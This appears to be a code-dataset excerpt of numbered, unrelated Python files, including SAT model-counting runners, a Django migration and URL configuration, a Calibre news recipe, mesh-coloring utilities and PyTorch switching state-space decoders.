    codes of SAT solvers. (Name keeps its historical typo for callers.)
    """
    return exit_code in (0, 10, 20)
def run_bash(cmd,timeout=None):
    """Run `cmd` in a shell, optionally under a timeout.

    Without a timeout the command runs directly and returns 'success' or
    'error' (exit code not in {0, 10, 20}). With a timeout the command is
    delegated to the helper script run_cmd_py3.py via temp files, and the
    status string it wrote ('success'/'timeout'/...) is returned.

    NOTE(review): the fixed temp file names make concurrent invocations
    clobber each other -- confirm this is only ever run serially.
    """
    print('cmd >>>',cmd)
    if timeout is None:
        exit_code = subprocess.call([cmd],shell=True)
        if not vaildate_exit_code(exit_code) :
            print("Exit Status error! status={}\nError cmd={}".format(exit_code,cmd))
            return 'error'
        else:
            return 'success'
    else:
        # Hand off to a Python 3 wrapper that enforces the timeout and
        # records the outcome in temp_status.
        temp_cmd_file = 'temp_cmd_file.txt'
        temp_status = 'temp_status.txt'
        save_to_file(cmd,temp_cmd_file)
        cmd='python3 run_cmd_py3.py {} {} {}'.format(temp_cmd_file,temp_status,timeout)
        run_bash(cmd)
        return load_from_file(temp_status)
def run_mis(cnf_file,output_cnf_file):
    '''
    Compute a Minimal Independent Support (MIS) of cnf_file and write a copy
    of the CNF with a "c ind ..." sampling-set header to output_cnf_file.

    :param cnf_file: path to the input DIMACS CNF (relative to this dir).
    :param output_cnf_file: destination CNF annotated with the MIS header.
    :return: ('success', runtime_seconds), ('timeout', 'timeout'),
             or ('error', 'error').
    '''
    start_t = time.time()
    # Run MIS on file (MIS.py lives in mis/ and writes ../mis.out).
    cmd = 'cd mis/ && python MIS.py -output=../mis.out {}'.format('../'+cnf_file)
    bash_output=run_bash(cmd,timeout=glbl_vars.timeout_limit)
    print 'mis',bash_output
    end_t=time.time()
    run_time=end_t-start_t
    # Check output status
    if bash_output=='timeout':
        print 'Timeout'
        run_bash('./kill_mis.sh')
        return 'timeout','timeout'
    elif bash_output=='error':
        return 'error','error'
    else:
        assert bash_output=='success'
        # Rewrite MIS.py's "v ..."-style first line into the "c ind ..."
        # comment format understood by approxMC.
        with open("mis.out", "r") as f_temp:
            c_ind = f_temp.read()
        c_ind = "c ind {}".format(c_ind[2:])
        with open("mis.out", "w") as f_temp:
            f_temp.write(c_ind)
        # Prepend the header to the CNF by appending the CNF to mis.out,
        # then move the combined file into place.
        cmd = "cat {} >> {} && mv {} {}".format(cnf_file,'mis.out','mis.out',output_cnf_file)
        run_bash(cmd)
        return 'success',run_time
def run_approxMC(cnf_file,mis=False):
    '''
    Run the approximate model counter (./scalmc) on cnf_file.

    :param mis: preprocess cnf_file with run_mis to restrict counting to a
                minimal independent support.
    :return: (numSols, runtime_seconds) on success, ('timeout', 'timeout')
             or ('error', 'error') otherwise.

    NOTE(review): the MIS-timeout branch returns a single 'timeout' while
    every other path returns a pair -- confirm callers handle both shapes.
    '''
    # run MIS on file
    if mis:
        cnf_file_ind=cnf_file+'.ind'
        return_status,mis_time = run_mis(cnf_file,cnf_file_ind)
        if return_status == 'timeout':
            return 'timeout'
        else:
            assert return_status=='success'
            approxMC_input = cnf_file_ind
    else:
        approxMC_input = cnf_file
    start_t = time.time()
    approxMC_output=approxMC_input+'.sol.approx'
    # run approxMC on file
    cmd = "./scalmc {} > {}".format(approxMC_input, approxMC_output)
    bash_output=run_bash(cmd,timeout=glbl_vars.timeout_limit)
    print 'approxMC',bash_output
    end_t=time.time()
    run_time=end_t-start_t
    # Check output status
    if bash_output=='timeout':
        print 'Timeout'
        run_bash('./kill_approxMC.sh')
        return 'timeout','timeout'
    # The exit codes returned by approxMC do not follow common convention
    else:
        # Process approxMC output to get #Sols/check for error
        print "reading approxMC's output..."
        numSols = process_approxMC_output(approxMC_output)
        if numSols=='error':
            # Keep the offending input around for post-mortem debugging.
            run_bash('mkdir segmentation_faults')
            run_bash('cp {} segmentation_faults/{}'.format(approxMC_input,approxMC_input))
            return 'error','error'
        else:
            return numSols,run_time
def run_weightMC(cnf_file,sol_file):
    """Run the weighted model counter (./weightmc) on cnf_file.

    Output is redirected to sol_file and parsed with
    process_weightMC_output.

    :return: (numSols, runtime_seconds) on success, ('timeout', 'timeout')
             or ('error', 'error') otherwise.
    """
    start_t=time.time()
    # run weightMC on file
    cmd = "./weightmc {} > {}".format(cnf_file, sol_file)
    bash_output=run_bash(cmd,timeout=glbl_vars.timeout_limit)
    print 'weightMC',bash_output
    end_t=time.time()
    run_time=end_t-start_t
    # Check output status
    if bash_output=='timeout':
        print 'Timeout'
        run_bash('./kill_weightMC.sh')
        return 'timeout','timeout'
    # The exit codes returned by weightMC do not follow common convention
    else:
        # Process weightMC output to get #Sols/check for error
        print "reading weightMC's output..."
        numSols = process_weightMC_output(sol_file)
        if numSols=='error':
            # Keep the offending input around for post-mortem debugging.
            run_bash('mkdir segmentation_faults')
            run_bash('cp {} segmentation_faults/{}'.format(cnf_file,cnf_file))
            return 'error','error'
        else:
            return numSols,run_time
def run_sharpSAT(cnf_file,sol_file,return_time=False):
    '''
    Run the exact model counter sharpSAT on cnf_file, save output to
    sol_file, and parse it.

    :param return_time: also return the runtime reported by sharpSAT.
    :return: the exact count (or (count, seconds) when return_time),
             'timeout'/'error' (duplicated into a pair when return_time).
    '''
    # Run SharpSat on file
    cmd = "./sharpSAT {} > {}".format(cnf_file, sol_file)
    bash_output=run_bash(cmd,timeout=glbl_vars.timeout_limit)
    print 'sharpSAT',bash_output
    # Check output status
    if bash_output=='timeout':
        print 'Timeout'
        run_bash('./kill_sharpsat.sh')
        if return_time:
            return 'timeout','timeout'
        else:
            return 'timeout'
    elif bash_output=='error':
        if return_time:
            return 'error','error'
        else:
            return 'error'
    else:
        assert bash_output=='success'
        # Process sharpSat output to get #Sols
        print "reading SharpSat's output..."
        numSols = process_sharpSat_output(sol_file,return_time=return_time)
        return numSols
|
22,077 | 1e574bba7a33958ed18279e8fcf2ccede7f1b702 | # coding=utf-8
from cw_performance.speed_contest import SpeedContest
__author__ = 'Cezary Wagner'
__copyright__ = 'Copyright 2015-2018, Cezary K. Wagner.'
__license__ = 'Apache License 2.0'
__version__ = '1.0'
def init():
    # Reset the shared counter before each timed run of the contest.
    global x
    x = 0
def simple_add():
    # Candidate 1: increment via explicit re-assignment (x = x + 1).
    global x
    x = x + 1
def increment_add():
    # Candidate 2: increment via augmented assignment (x += 1).
    global x
    x += 1
if __name__ == '__main__':
    # Benchmark the two increment styles against each other; `init` resets
    # the shared counter before every measurement.
    sc = SpeedContest()
    sc.add_function(simple_add, init)
    sc.add_function(increment_add, init)
    sc.timeit_functions(verbose=True)
    sc.repeat_functions(verbose=True)
|
22,078 | 34eba244be54eedba6d37cb59c7185fd9945595b | #
# @lc app=leetcode id=3 lang=python3
#
# [3] Longest Substring Without Repeating Characters
#
class Solution:
    def lengthOfLongestSubstring(self, s: str) -> int:
        """Return the length of the longest substring of s with no repeated
        characters, using a sliding window over last-seen positions."""
        if not s:
            return 0
        best = 0
        start = 0            # left edge of the current duplicate-free window
        last_seen = {}       # character -> most recent index
        for idx, ch in enumerate(s):
            if ch in last_seen and last_seen[ch] >= start:
                # ch repeats inside the window: slide the left edge past
                # its previous occurrence.
                start = last_seen[ch] + 1
            last_seen[ch] = idx
            window = idx - start + 1
            if window > best:
                best = window
        return best
# if __name__ == "__main__":
# s = Solution()
# print(s.lengthOfLongestSubstring("pwwkew"))
|
22,079 | 2406ba9b8518b6e41230c9233077347caa9fce06 | # Generated by Django 2.2.5 on 2020-03-16 10:34
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make SchoolEvent.end_date optional (blank/null) for open-ended events."""

    dependencies = [
        ('schedule', '0003_schoolevent'),
    ]

    operations = [
        # Relax end_date: previously required, now allowed to be empty/NULL.
        migrations.AlterField(
            model_name='schoolevent',
            name='end_date',
            field=models.DateTimeField(blank=True, null=True),
        ),
    ]
|
22,080 | fa83dfd7a3e7c8ed4b3c209f1c561c4a3025c9db | from model.tree import LabelNode
from model.tree import DecisionNode
def print_tree(decision_tree):
    """Recursively pretty-print a decision tree to stdout.

    A LabelNode (leaf) prints its label and entropy; a DecisionNode prints
    the attribute it splits on, then each subtree key followed by the
    subtree itself.
    """
    if isinstance(decision_tree, LabelNode):
        print "============ LABEL ============"
        print "Label:\t\t" + str(decision_tree.label)
        print "Entropy:\t" + str(decision_tree.entropy)
        print "==============================="
    else:
        print "========== DECISION ==========="
        print "Split On:\t" + str(decision_tree.attribute)
        print "Entropy:\t" + str(decision_tree.entropy)
        print "==============================="
        for subtree_key in decision_tree.subtrees:
            # Print the branch value, then recurse into that branch.
            print subtree_key
            print_tree(decision_tree.subtrees[subtree_key])
22,081 | 045c124143663e1ca9ba61bf3f31b7c3114e1a7c | from django.conf.urls.defaults import *
from django.views.generic import DetailView, ListView
from coa.models import Account
from utils import *
urlpatterns = patterns('',
    # Chart-of-accounts index: all accounts ordered by category then account
    # number, served by a login-protected list view.
    (r'^$',
        ProtectedListView.as_view(
            queryset=Account.objects.order_by('category', 'accno'),
            context_object_name='accounts_list',
            template_name='coa/index.html')),
    # Create a new account / edit an existing one (same view handles both).
    (r'^accounts/$', 'coa.views.account_edit'),
    (r'^accounts/(?P<account_id>\d+)/$', 'coa.views.account_edit'),
    # Detail view for deleting a single account.
    # NOTE(review): the name 'poll_results' and results.html template appear
    # copied from the Django tutorial -- confirm they are intentional.
    url(r'^(?P<pk>\d+)/delete/$',
        ProtectedDetailView.as_view(
            model=Account,
            template_name='results.html'),
        name='poll_results'),
    # (r'^(?P<poll_id>\d+)/vote/$', 'coa.views.vote'),
)
|
22,082 | 32a53eb28c7829c2e061c9590ae7e00c6e369393 | import speech_recognition as sr
import webbrowser
print("welcome to my tools\n\n")
print("enter ur requirements .... We are listening ...",end='')
#ch=input()
# Record one utterance from the default microphone and transcribe it with
# Google's speech recognition service.
r=sr.Recognizer()
with sr.Microphone() as source:
    print('start saying..')
    p= r.listen(source)
    print('We got it .. Please Wait ..')
ch=r.recognize_google(p)
# NOTE(review): `and` binds tighter than `or`, so this condition is
# (("date" in ch) and ("run" in ch)) or ("execute" in ch) -- any phrase
# containing "execute" opens the date page. Presumably
# ("date" in ch) and (("run" in ch) or ("execute" in ch)) was intended;
# confirm before changing.
if ("date" in ch) and ("run" in ch) or ("execute" in ch):
    webbrowser.open("http://192.168.0.107/cgi-bin/iiec.py?x=date")
elif "calender" in ch:
    webbrowser.open("http://192.168.0.107/cgi-bin/iiec.py?x=cal")
else:
    print("not understand")
|
22,083 | 40f3c80c7e71f086e531c67ecd6cce09916ad671 | # x='ajmal'
# for i in x:
# print(i)
# for i in range (1,500):
# if i%5!=0:
# print(i)
# import math
# for i in range (1,100):
# a=math.sqrt(i)
# if i%a==0:
# print(i)
# if int(a)**2==i:
# print(i)
# for i in range(1,20):
# if i%2!=0:
# print(i)
#for else telusko
|
22,084 | d8e4d453ac1646a967114b87aabeb89b082fff1b | # -*- coding: utf-8 -*-
# @Author: ruian2, kelu2
# @Date: 2017-04-01 21:34:40
# @Last Modified by: Luke
# @Last Modified time: 2017-05-10 04:41:27
# import bpy
import pymesh
import numpy as np
import csv
#TODO You also need to update the colors in the csv color, each row corresponds to the color you want fill to that segment
#TODO The default fine name is colorscheme.csv
def gridGen(mesh_name):
    """Build an adjacency map for the mesh stored at mesh_name.

    Returns a dict mapping each vertex index to the list of indices of its
    adjacent vertices, as reported by pymesh connectivity.
    """
    mesh = pymesh.load_mesh(mesh_name)
    mesh.enable_connectivity()
    adjacency = {
        idx: list(mesh.get_vertex_adjacent_vertices(int(idx)))
        for idx in range(len(mesh.vertices))
    }
    return adjacency
def alpha_blending(src, dest, alpha):
    """Blend src toward dest: alpha*src + (1-alpha)*dest, truncated to ints.

    :param src: foreground color components (elementwise-arithmetic array,
                e.g. a numpy array).
    :param dest: background color components, same shape as src.
    :param alpha: blend factor in [0, 1] (1 keeps src, 0 keeps dest).
    :return: plain list of ints, one per component.
    """
    # alpha*(src-dest)+dest is algebraically alpha*src + (1-alpha)*dest.
    blended = alpha * (src - dest) + dest
    # int() truncation matches the original behavior; previously the result
    # list shadowed the builtin name `list`.
    return [int(component) for component in blended]
def color_vertices(obj, alpha, mesh_name, seg_number):
    """Color background vertices of `obj` with the CSV color of one segment,
    then alpha-blend every vertex toward the background (251, 247, 240).

    :param obj: pymesh mesh with a flat "vertex_color" attribute (RGB per
                vertex).
    :param alpha: per-vertex blend factors, indexed by vertex id.
    :param mesh_name: unused here.
    :param seg_number: 1-based row index into colorscheme.csv.

    NOTE(review): row[0]/row[1]/row[2] are read as red/blue/green but
    written back in R,G,B slots -- confirm the CSV column order is R,B,G.
    """
    mesh = obj
    vertices_colors = mesh.get_attribute("vertex_color")
    counter = 0
    redVal = 0
    greenVal = 0
    blueVal = 0
    f = open("colorscheme.csv", "r")
    color_csv = csv.reader(f)
    for row in color_csv:
        print counter
        print seg_number
        # Row (seg_number - 1) of the CSV holds this segment's color.
        if seg_number-1 == counter:
            redVal = row[0]
            blueVal = row[1]
            greenVal = row[2]
            print redVal
            print blueVal
            print greenVal
        counter += 1
    for i in range(mesh.num_vertices):
        # Only recolor vertices still at the background color; blend all.
        if(np.array_equal(vertices_colors[i*3: i*3+3], np.array([251,247,240]))):
            vertices_colors[0 + 3 * i] = redVal
            vertices_colors[1 + 3 * i] = greenVal
            vertices_colors[2 + 3 * i] = blueVal
        vertices_colors[i*3: i*3+3] = alpha_blending(vertices_colors[i*3: i*3+3], np.array([251, 247, 240]), alpha[i])
        # vertices_colors[i*3: i*3+3] = alpha_blending(vertices_colors[i*3: i*3+3], np.array([255,255,255]), alpha[i])
    mesh.set_attribute("vertex_color", vertices_colors)
    f.close()
def change_format(inputFileName, outputFileName):
    """Rewrite a PLY file: replace the 8th header line with separate
    red/green/blue uchar properties and drop the 4th field of every vertex
    row, writing the result to outputFileName.

    NOTE(review): the magic indices assume a fixed layout -- header line 3
    is "element vertex <N>" (characters from offset 15 hold N) and vertex
    data starts at line 13 of the modified line list; the dropped 4th
    column is presumably an alpha channel. Confirm against the files
    produced upstream before reuse.
    """
    file = open(inputFileName)
    lines = []
    for line in file:
        lines.append(line)
    # print lines
    file.close()
    # Vertex count parsed from the "element vertex <N>" header line.
    num_vertices = int(lines[3][15:-1])
    # Swap the original 8th header line for explicit RGB properties.
    del lines[7]
    lines.insert(7, "property uchar red\n")
    lines.insert(8, "property uchar green\n")
    lines.insert(9, "property uchar blue\n")
    for i in range(13,num_vertices+13):
        # Drop the 4th space-separated field of each vertex row.
        line_list = lines[i].split(" ")
        del line_list[3]
        new_line = " ".join(line_list)
        del lines[i]
        lines.insert(i, new_line)
    file = open(outputFileName, "w")
    for line in lines:
        file.write(line)
    file.close()
def get_mesh(mesh_name):
    """Load mesh_name via pymesh, enable connectivity, and initialise every
    vertex color to the background color (251, 247, 240).

    Resetting the vertex_color attribute up-front ensures the same model can
    be colored repeatedly from a clean state.
    """
    mesh = pymesh.load_mesh(mesh_name)
    mesh.enable_connectivity()
    # Vertex colors must be (re)initialised first so repeated colorings of
    # the same model do not accumulate.
    mesh.add_attribute("vertex_color")
    vertices_colors = np.zeros(3*mesh.num_vertices)
    for i in range(mesh.num_vertices):
        vertices_colors[i*3: i*3+3] = np.array([251,247,240])
    mesh.set_attribute("vertex_color", vertices_colors)
    return mesh
|
22,085 | d73ca2ce6667602ba624815eaacdaa0ba6157584 | # Extract all name=value pairs from a GET url and place them into a dictionary
#
# Example GET url: b"GET /?name1=0.07&name2=0.03&name3=0.13 HTTP/1.1\r\n"
#
def extract(request):
    """Parse the query string of a raw HTTP GET request line into a dict.

    :param request: bytes such as b"GET /?a=1&b=2 HTTP/1.1\\r\\n".
    :return: {"a": "1", "b": "2"} with str keys/values decoded as UTF-8;
             {} when the request contains no '?'.
    """
    d = dict()
    p = request.find(b"?")
    if p == -1:
        return d
    while True:
        n_start = p + 1
        n_end = request.find(b"=", n_start)
        if n_end == -1:
            break  # malformed trailing pair without '='; stop parsing
        v_start = n_end + 1
        p_space = request.find(b" ", v_start)
        p_and = request.find(b"&", v_start)
        # The value ends at the first of ' ' or '&'; either may be absent.
        # BUG FIX: the original took min(p_space, p_and) without handling
        # p_space == -1, producing v_end == -1 (a wrong, truncating slice)
        # for requests without a trailing " HTTP/x.y".
        candidates = [idx for idx in (p_space, p_and) if idx != -1]
        v_end = min(candidates) if candidates else len(request)
        d[request[n_start:n_end].decode("utf-8")] = request[v_start:v_end].decode("utf-8")
        p = request.find(b"&", v_end)
        if p == -1:
            break
    return d
|
22,086 | e411ded4b0b09ed90a237f540a5664c08f631436 | import pandas as pd
import plot_nn
from plot_nn import plot_nn_fake
import numpy as np
from matplotlib import pyplot as plt
# nu_max values 1980..2996 in steps of 4: one synthetic spectrum per value.
nu_max=np.arange(1980,3000,4)
for nu in range(nu_max.size):
    # Load the fake spectrum for this nu_max, plot it, and save the figure.
    path="/home/rakesh/Fake_Data/MultiTrip/Spec_numax_%d.csv"%nu_max[nu]
    df=pd.read_csv(path)
    plot_nn_fake(df)
    plt.savefig("/home/rakesh/Plots/28Jan/Train/numax_%d.png"%nu_max[nu])
    plt.close()
|
22,087 | 1f4f8e0381deff3ae9bd5348a166aa408f232418 |
"""nectarchain command line tools.
"""
|
22,088 | b3e133c7678fc9f7da939e1053abf7acdf7cb930 | #!/usr/bin/env python2
# vim:fileencoding=utf-8
from __future__ import unicode_literals, division, absolute_import, print_function
from calibre.web.feeds.news import BasicNewsRecipe
from datetime import date
import json
import urllib2
class AdvancedUserRecipe1473929478(BasicNewsRecipe):
    """Calibre recipe for the Nordwest Zeitung, fed from a local ePaper
    proxy server that exposes per-section feeds under /today/."""
    server = "http://drbaumert/nwz"
    title = 'Nordwest Zeitung'
    __author__ = 'jhbruhn'
    publication_type = 'newspaper'
    oldest_article = 7
    use_embedded_content = True
    max_articles_per_feed = 100
    auto_cleanup = False
    auto_cleanup_keep = '//img[@class="image"]|//*[@class="unterzeile-ipad"]'
    compress_news_images = True
    masthead_url = server + '/masthead.gif'
    # Today's date, zero-padded, used to build the front-page cover URL.
    # NOTE(review): isocalendar()[0] is the ISO year, which can differ from
    # the calendar year around New Year -- confirm this is intended.
    year = str(date.today().isocalendar()[0])
    month = str(date.today().month).zfill(2)
    day = str(date.today().day).zfill(2)
    cover_url = 'http://www.nwzonline.de/NWZ/ePaperIssue/epaper/NWZOnline/' + \
        year + month + day + '/NWZ/Olde%20N/fp_Preview/1_H_PORTRAIT.jpg'
    # Styling for the paper's iPad-flavored CSS classes.
    extra_css = """ .unterzeile-ipad {
    font-size: 0.9em;
    font-style: italic;
    }
    .headline {
    font-size: 1.3em;
    }
    .p-ipad {
    font-style: normal;
    }
    .vorspann-im-text-ipad {
    font-style: italic;
    }
    .frage-ipad {
    font-style: italic !important;
    }
    .antwort-ipad {
    font-style: normal;
    }
    .name-ipad {
    font-weight: 700;
    font-style: bold !important;
    text-transform: uppercase;
    display: inline !important;
    }
    stichwort {
    text-transform: uppercase !important;
    }
    .autor-ipad {
    text-transform: uppercase;
    }
    .ortsmarke-ipad {
    font-style: bold !important;
    text-transform: uppercase;
    display: inline-block !important;
    }
    .autorenkuerzel-ipad {
    display: inline;
    text-transform: uppercase;
    }
    .p-ipad {
    font-style: normal !important;
    }"""

    def get_feeds(self):
        # The proxy lists section names in sections.json; each maps to a
        # feed file whose name replaces ' ' with '_' and '&' with 'und'.
        sections = json.load(urllib2.urlopen(self.server + '/today/sections.json'))
        feeds = []
        for section in sections:
            feeds.append((section, self.server + '/today/feed-' + section.replace(" ", "_").replace("&", "und") + '.xml'))
        return feeds
|
22,089 | 62ee8280c9b7ce8ef33973355dadc4b380af3eaa | from setuptools import setup, find_packages
# Package version -- keep in sync with release tags.
VERSION = '0.2.2'

# PyPI long description comes straight from the README.
with open("README.md", "r") as fh:
    README = fh.read()

setup(
    name="one-config",
    version=VERSION,
    description="A universally accessible config object that only has to be constructed once",
    long_description=README,
    long_description_content_type="text/markdown",
    url="https://github.com/LiamConnell/one-config",
    author="LiamConnell",
    # author_email="",
    license="MIT",
    classifiers=[
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.7",
    ],
    packages=find_packages(exclude=('tests',)),
    include_package_data=True,
    # Runtime dependency: YAML config parsing.
    install_requires=["PyYAML"],
    # entry_points={
    #     "console_scripts": [
    #         "realpython=reader.__main__:main",
    #     ]
    # },
)
22,090 | d1979d6173310731ee4753d8efde641d2c032622 | # Decoder (Models)
import torch as t
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from base_class import Decoder
from torch.autograd import Variable
class LDSDecoder(Decoder):
    """
    Linear Gaussian State Space Model (LDS).

    Generative model:  z_s = A z_{s-1} + N(0, Q),   x_s = C z_s + N(0, R).

    Attributes:
        m: dimension of hidden state space
        n: dimension of observation space
        S: length of series
        A: latent state transition matrix
        Q: latent innovation covariance (Q = LQ LQ^T)
        C: observation matrix
        R: observation noise covariance (R = LR LR^T)
    """
    def __init__(self, **model_params):
        super(LDSDecoder, self).__init__(model_params=model_params)
        self.m = model_params['m']
        self.n = model_params['n']
        self.S = model_params['S']
        self.A = nn.Parameter(t.from_numpy(model_params['A']).float())
        # Parameterize covariances through their Cholesky factors so Q and R
        # stay positive semi-definite under gradient updates.
        self.LQ = nn.Parameter(t.from_numpy(
            np.linalg.cholesky(model_params['Q'])
        ).float())
        self.Q = t.matmul(self.LQ, t.t(self.LQ))
        self.C = nn.Parameter(t.from_numpy(model_params['C']).float())
        self.LR = nn.Parameter(t.from_numpy(
            np.linalg.cholesky(model_params['R'])
        ).float())
        self.R = t.matmul(self.LR, t.t(self.LR))

    def predict_x(self, z):
        """Sample observations for each latent trajectory in z.

        z is indexed as z[batch, step]; returns x of shape
        (batch, steps, n).
        """
        x = t.zeros((z.shape[0], z.shape[1], self.n))
        noise = t.distributions.Normal(t.zeros(self.m), self.LR)
        for b in range(z.shape[0]):
            for s in range(z.shape[1]):
                eps = noise.sample()
                # BUG FIX: the original added the distribution object `noise`
                # itself (a TypeError at runtime) instead of the drawn
                # sample `eps`.
                x[b, s] = t.matmul(self.C, z[b, s]) + eps
        return x

    def loglike(self, x, z):
        """Mean joint log-likelihood log p(x, z) over the batch.

        x and z arrive batch-first and are permuted to time-first so the
        recurrence can scan over steps.
        """
        z = z.permute(1, 2, 0)
        x = x.permute(1, 2, 0)
        emit_dist = t.distributions.Normal(
            t.matmul(self.C, z[0]), self.LR)
        loglike = emit_dist.log_prob(x[0])
        # xrange -> range for consistency with generate_data and so the
        # class stays importable on Python 3.
        for s in range(1, self.S):
            emit_dist = t.distributions.Normal(
                t.matmul(self.C, z[s]), self.LR)
            trans_dist = t.distributions.Normal(
                t.matmul(self.A, z[s-1]), self.LQ)
            p_emit = emit_dist.log_prob(x[s])
            p_tran = trans_dist.log_prob(z[s])
            loglike += p_emit + p_tran
        return t.mean(loglike)

    def generate_data(self, N):
        """Draw N independent series from the model.

        :return: (X, Z) numpy arrays of shapes (N, S, n) and (N, S, m).
        """
        A = np.array(self.A.data.tolist())
        C = np.array(self.C.data.tolist())
        Q = np.array(self.Q.data.tolist())
        R = np.array(self.R.data.tolist())
        Zs = [None] * N
        Xs = [None] * N
        for n in range(N):
            z = np.zeros((self.S, self.m))
            x = np.zeros((self.S, self.n))
            # Initial state uses an inflated covariance of 2Q.
            z_prev = np.random.multivariate_normal(
                mean=np.zeros(self.m),
                cov=Q*2,
            )
            for s in range(0, self.S):
                z_cur = np.random.multivariate_normal(
                    mean=np.dot(A, z_prev),
                    cov=Q,
                )
                x_cur = np.random.multivariate_normal(
                    mean=np.dot(C, z_cur),
                    cov=R,
                )
                z[s] = z_cur
                x[s] = x_cur
                z_prev = z_cur
            Zs[n] = z
            Xs[n] = x
        Z = np.stack(Zs, axis=0)
        X = np.stack(Xs, axis=0)
        return X, Z
class SLDSDecoder(Decoder):
    """
    Switching Linear Gaussian State Space Model (SLDS).

    A discrete Markov chain w_s (num_states states, transitions Pi) selects,
    at each step, which linear-Gaussian dynamics and observation model
    generate z_s and x_s. Only scalar latents/observations (m = n = 1) are
    supported.

    Attributes:
        num_states: number of discrete latent states
        m: dimension of hidden state space (must be 1)
        n: dimension of observation space (must be 1)
        S: length of series
        Pi: (num_states, num_states) discrete transition matrix
        A: per-state latent transition matrices
        Delta_Q: per-state latent innovation drift
        Q: per-state latent innovation variance
        C: per-state observation matrices
        R: per-state observation variance
    """
    def __init__(self, **model_params):
        super(SLDSDecoder, self).__init__(model_params=model_params)
        self.num_states = model_params['num_states']
        self.m = model_params['m']
        self.n = model_params['n']
        self.S = model_params['S']
        if self.m != 1 or self.n != 1:
            raise NotImplementedError("n and m must be 1 (scalar x and z)")
        self.Pi = nn.Parameter(t.from_numpy(model_params['Pi']).float())
        self.A = nn.Parameter(t.from_numpy(model_params['A']).float())
        self.Delta_Q = nn.Parameter(t.from_numpy(model_params['Delta_Q']).float())
        self.Q = nn.Parameter(t.from_numpy(model_params['Q']).float())
        self.C = nn.Parameter(t.from_numpy(model_params['C']).float())
        self.R = nn.Parameter(t.from_numpy(model_params['R']).float())

    def predict_x(self, z):
        # Sampling observations given latents is not implemented for SLDS.
        raise NotImplementedError()

    def _forward_pass_batched(self, x, z):
        """Forward pass marginalizing over the discrete states.

        Computes log p(x, z) per batch element by scanning over time and
        summing the discrete-state filtering vector. To avoid underflow the
        per-step probabilities are rescaled (max subtracted in log space,
        vector renormalized) and the removed factors are accumulated in
        log_constant, which is returned as the log-likelihood.
        """
        # Permute batch-first tensors to time-first for the scan.
        z = z.permute(1, 2, 0)
        x = x.permute(1, 2, 0)
        # Uniform prior over discrete states.
        prob_vector = Variable(
            t.ones((self.num_states, x.shape[-1]))/self.num_states
        )
        log_constant = Variable(t.zeros(x.shape[-1]))
        z_prev = Variable(t.zeros((self.n, x.shape[-1])), requires_grad=False)
        for s in range(0, x.shape[0]):
            z_cur = z[s]
            x_cur = x[s]
            # Log Pr(Y, X | X_prev) per discrete state k.
            logP_s = Variable(t.zeros((self.num_states, x.shape[-1])))
            for k in range(self.num_states):
                emit_dist = t.distributions.Normal(
                    t.matmul(self.C[k], z_cur), t.sqrt(self.R[k]))
                trans_dist = t.distributions.Normal(
                    t.matmul(self.A[k], z_prev)+self.Delta_Q[k],
                    t.sqrt(self.Q[k]))
                logP_s[k] = emit_dist.log_prob(x_cur) + trans_dist.log_prob(z_cur)
            # Rescale by the per-column max to keep exp() in range.
            log_constant = log_constant + t.max(logP_s, dim=0)[0]
            P_s = t.exp(logP_s - t.max(logP_s, dim=0)[0])
            # Propagate the discrete-state distribution through Pi, then
            # weight by this step's evidence.
            prob_vector = t.transpose(
                t.matmul(t.transpose(prob_vector, 0,1), self.Pi), 0, 1,
            )
            prob_vector = prob_vector * P_s
            log_constant = log_constant + t.log(t.sum(prob_vector, dim=0))
            prob_vector = prob_vector/t.sum(prob_vector, dim=0)
            z_prev = z_cur
        return log_constant

    def loglike(self, x, z):
        """Mean log p(x, z) over the batch (discrete states marginalized)."""
        loglike = self._forward_pass_batched(x, z)
        return t.mean(loglike)

    def generate_data(self, N):
        """Draw N independent series from the model.

        :return: (X, Z, W) numpy arrays -- observations, continuous latents,
                 and discrete state sequences of shape (N, S).
        """
        Pi = np.array(self.Pi.data.tolist())
        A = np.array(self.A.data.tolist())
        Delta_Q = np.array(self.Delta_Q.data.tolist())
        Q = np.array(self.Q.data.tolist())
        C = np.array(self.C.data.tolist())
        R = np.array(self.R.data.tolist())
        Ws = [None] * N
        Zs = [None] * N
        Xs = [None] * N
        for n in range(N):
            w = np.zeros((self.S))
            z = np.zeros((self.S, self.m))
            x = np.zeros((self.S, self.n))
            # Initial discrete state uniform; initial z uses covariance 2Q.
            w_prev = random_categorical(
                np.ones(self.num_states)/self.num_states,
            )
            z_prev = np.random.multivariate_normal(
                mean = np.zeros(self.m),
                cov = Q[w_prev]*2,
            )
            for s in range(0,self.S):
                w_cur = random_categorical(Pi[w_prev])
                z_cur = np.random.multivariate_normal(
                    mean=np.dot(A[w_cur], z_prev) + Delta_Q[w_cur],
                    cov=Q[w_cur],
                )
                x_cur = np.random.multivariate_normal(
                    mean=np.dot(C[w_cur], z_cur),
                    cov=R[w_cur],
                )
                w[s] = w_cur
                z[s] = z_cur
                x[s] = x_cur
                w_prev = w_cur
                z_prev = z_cur
            Ws[n] = w
            Zs[n] = z
            Xs[n] = x
        W = np.stack(Ws, axis=0)
        Z = np.stack(Zs, axis=0)
        X = np.stack(Xs, axis=0)
        return X, Z, W
def random_categorical(pvals, size=None):
    """Draw a categorical sample: index k with probability pvals[k].

    Implemented as a one-hot multinomial draw dotted with arange(len(pvals)).
    NOTE(review): with size > 1 the dot product yields an array and int()
    raises -- callers appear to use the default size=None; confirm.
    """
    one_hot = np.random.multinomial(n=1, pvals=pvals, size=size)
    return int(one_hot.dot(np.arange(len(pvals))))
|
22,091 | 8c4964972aab2bcf9d96e7cd808d9312ea9a5c61 | class MyExcept (Exception) :
def end(self):
print(" 11 ")
if __name__ == '__main__':
    try:
        # 5/0 raises ZeroDivisionError first, so the `raise MyExcept` below
        # (and its handler, and the else branch) are never reached here.
        print(5/0)
        raise MyExcept  # trigger condition for the custom exception
    except MyExcept as e:  # the custom exception
        print(e)
        e.end()
    except ZeroDivisionError as e :
        print(e)
        print("除数为0异常")
    except Exception as e :
        # Catch-all via the common base class of the custom exception.
        print(e)
        print("自定义异常继承的父类异常(最大异常)")
    else:
        print("程序完毕")
22,092 | 0905a6f5e65ea18fdb2ed252d3ea0fc3170f8c8d |
from config import load_args
from transforms import baseline
from models import Encoder, Predictor, SimSiam, LinearClassifier
from schedulers import SimpleCosineDecayLR
from utils import accuracy, AverageMeter
import time
import os
import torch
from torch import nn, optim
from torchvision.datasets import CIFAR10
